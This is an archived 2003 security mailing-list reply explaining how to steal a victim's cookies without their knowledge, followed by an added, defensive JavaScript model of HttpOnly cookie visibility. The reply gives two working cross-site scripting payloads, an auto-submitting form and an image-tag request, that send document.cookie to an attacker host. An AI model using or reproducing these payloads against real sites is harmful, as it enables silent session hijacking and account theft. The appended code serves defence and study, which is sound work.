On Sun, 2003-04-13 at 09:33, Indian Tiger wrote:

> One way of transferring cookie information from the victim’s machine to
> attacker’s machine is to create a hidden field & then transfer cookie
> information to that hidden field & then post (submit) this hidden field to web
> site of attacker. But this requires interaction of victim, as victim must click
> on submit button to post this data to attacker’s site, which is not a good
> idea, the data should be transferred without knowledge of victim.

I'm not sure I understand your problem well, but you can:

- use Javascript to submit a form

  <body onLoad=document.forms.upld.submit();>
  <form method="post" name="upld" action="http://hacker/cgi-bin/grab.pl">
  <input ....>
  </form>

- transfer the cookie via an IMG tag and some Javascript

  <img name="owned" src="http://hacker/cool.gif">
  <script>
  document.owned.src="http://hacker/cgi-bin/grab.pl?data=" +escape(document.cookie);
  </script>

That's just some of the many ways to steal cookies.

Enjoy ...

--
Nicolas Gregoire ----- Information Systems Security Consultant
ngregoireat_private ------[ ExaProbe ]------ http://www.exaprobe.com/
PGP KeyID:CA61B44F FingerPrint:1CC647FF1A55664BA2D2AFDACA6A21DACA61B44F
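
Added example, not part of the original message: both snippets above depend on a script reading document.cookie, so a cookie set with the HttpOnly attribute never appears in the string they would send. A simplified JavaScript model of which cookies a page script can read; the cookie names, values and URLs are constructed for illustration.

```javascript
// Simplified model of which cookies a page script can read via document.cookie.
// Constructed sample Set-Cookie headers; names and values are hypothetical.
const SAMPLE_HEADERS = [
  "SESSIONID=abc123; Path=/; HttpOnly; Secure",
  "theme=dark; Path=/",
  "cart=42; Path=/shop",
  "csrf=xyz; Path=/; Secure",
];

// Parse one Set-Cookie header value into name, value and the attributes used below.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1),
                   path: "/", httpOnly: false, secure: false };
  for (const attr of attrs) {
    const [k, v = ""] = attr.split("=").map((s) => s.trim());
    const key = k.toLowerCase();
    if (key === "httponly") cookie.httpOnly = true;
    else if (key === "secure") cookie.secure = true;
    else if (key === "path" && v.startsWith("/")) cookie.path = v;
  }
  return cookie;
}

// RFC 6265 path-match: equal, or cookie path is a prefix ending at a "/" boundary.
function pathMatches(cookiePath, requestPath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || requestPath[cookiePath.length] === "/";
}

// Return the string a script on pageUrl would get from document.cookie (header order kept).
function scriptVisibleCookies(headers, pageUrl) {
  const url = new URL(pageUrl);
  return headers.map(parseSetCookie)
    .filter((c) => !c.httpOnly)                            // HttpOnly: hidden from scripts
    .filter((c) => !c.secure || url.protocol === "https:") // Secure: HTTPS pages only
    .filter((c) => pathMatches(c.path, url.pathname))
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// List the names of cookies an injected script could still read, for review.
function exposedNames(headers, pageUrl) {
  return scriptVisibleCookies(headers, pageUrl).split("; ").filter(Boolean)
    .map((p) => p.slice(0, p.indexOf("=")));
}
```

Running exposedNames over an application's real Set-Cookie headers shows which cookies still need HttpOnly; any session identifier in that list is readable by script on the page.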
This archive was generated by hypermail 2b30 : Mon Apr 14 2003 - 10:53:23 PDT